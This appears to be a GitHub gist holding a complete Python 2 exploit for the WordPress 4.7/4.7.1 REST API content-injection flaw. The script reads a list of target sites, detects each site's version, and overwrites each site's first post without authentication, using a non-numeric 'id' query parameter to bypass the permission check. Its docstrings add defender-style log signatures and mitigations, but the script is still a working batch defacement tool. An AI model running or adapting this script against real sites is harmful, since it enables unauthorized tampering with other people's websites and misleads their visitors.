@0xv
Created February 15, 2017 13:15
import re, json, urllib2, sys
class WpContent:
    """Probe one WordPress site and attempt to overwrite a post over its REST API.

    Defender context: every request this class makes carries no credentials
    (the only header set is Content-Type), so a successful post update means
    the site accepts unauthenticated writes. The version check below names
    WordPress 4.7 and 4.7.1 as the affected releases; sites still on those
    releases should be moved to a newer release.

    Log signature visible in this code: a fetch of the site front page, a GET
    of ``wp/v2/posts``, then a request with a JSON body to
    ``wp/v2/posts/<id>/?id=<id>CBF`` -- i.e. an ``id`` query parameter that is
    not purely numeric. No User-Agent is set, so urllib2's default
    (``Python-urllib/<version>``) is sent.
    """

    def __init__(self, url):
        # Fetches the page immediately; urlopen is called without a timeout and
        # any network/HTTP error propagates to the caller.
        self.__url = url
        self.__response = urllib2.urlopen(self.__url).read()

    def get_api_wp(self):
        """Return the REST API root advertised by the page's api.w.org link tag.

        Raises IndexError when the fetched HTML contains no such link.
        """
        return re.findall(r"https://api.w.org/' href='(.*)'", self.__response)[0]

    def get_wp_version(self):
        """Return the first ``ver=`` value found in the page plus a verdict label.

        The value is scraped from the HTML, presumably from asset URLs -- it is
        only a guess at the core version (TODO confirm). Hiding it is not a
        mitigation: main() attempts the update whatever label is returned.
        Raises IndexError when no ``ver=`` string is present.
        """
        check_version = re.findall(r'ver=(.*)"', self.__response)[0]
        if check_version == "4.7" or check_version == "4.7.1":
            check_version += " ( Maybe vulnerable to inject ) "
        else:
            check_version += " ( Maybe not vulnerable to inject ) "
        return check_version

    def get_wp_post_information(self):
        """Return the first post object from the site's ``wp/v2/posts`` listing."""
        get_post = urllib2.urlopen(self.get_api_wp()+"wp/v2/posts").read()
        load_info = json.loads(get_post)
        return load_info[0]

    def inject_content(self, id_content, content):
        """Send replacement title, slug and content for post ``id_content``.

        Returns the decoded JSON response. The title and slug are fixed
        strings, which makes tampered posts easy to search for afterwards.
        """
        data = json.dumps({
            'title':"Blah blah",
            'slug':"blah-blah",
            'content':content
        })
        params = {'Content-Type':'application/json'}
        # The numeric id is in the path, while the query string repeats it with
        # a non-numeric suffix. NOTE(review): presumably this mismatch is what
        # gets past the permission check on the affected releases -- confirm
        # against the vendor advisory. Rejecting non-numeric ``id`` values at a
        # proxy/WAF is a stop-gap until the site is upgraded.
        full_url = self.get_api_wp() + "wp/v2/posts/{0}/?id={0}CBF".format(id_content)
        # Passing a data argument makes urllib2 issue a POST.
        req = urllib2.Request(full_url, data, params)
        resp = urllib2.urlopen(req).read()
        return json.loads(resp)

    def save(self,url):
        """Append ``url`` to result.txt in the current working directory."""
        file = open('result.txt','a')
        file.write(url+'\n')
        # NOTE(review): ``file.close`` is referenced but never called, so the
        # handle is only released when the object is garbage-collected.
        file.close
def main():
    """Run the probe-and-update sequence against every URL in a target list.

    argv[1] is a file with one site URL per line; the replacement post body is
    read from ``content.txt``. Exits with status 1 when no target file is
    given. Python 2 only (print statement, urllib2).

    Defender context: this is a batch tool, so one source address producing
    the same short request sequence against many unrelated sites is the
    expected footprint. The update is attempted for every target regardless of
    the version label, so every site in such a list should have its first
    listed post checked for tampering.
    """
    if len(sys.argv) < 2:
        sys.exit(1)
    with open(sys.argv[1], 'r') as targets:
        targets = targets.read().splitlines()
    with open('content.txt', 'r') as content:
        content = content.read()
    for url in targets:
        try:
            wp = WpContent(url)
            wp_version = wp.get_wp_version()
            # Only the first post returned by the listing endpoint is touched.
            post_info = wp.get_wp_post_information()
            print('=========================================')
            print('{0} WP Version: {1}'.format(url,wp_version))
            # Under the Python 2 print statement, .format() applies to the
            # string before it is printed.
            print('Try Inject ID: {0}').format(post_info['id'])
            inject = wp.inject_content(post_info['id'], content)
            # The permalink from the response is logged to result.txt.
            wp.save(inject['link'])
            print('Post updated: '+inject['link'])
            print('=========================================')
        except Exception as e:
            # Any failure (network error, missing tag, rejected request) is
            # printed and the loop moves on to the next target.
            print e
# Run the batch only when the file is executed as a script, not on import.
if __name__ == '__main__':
    main()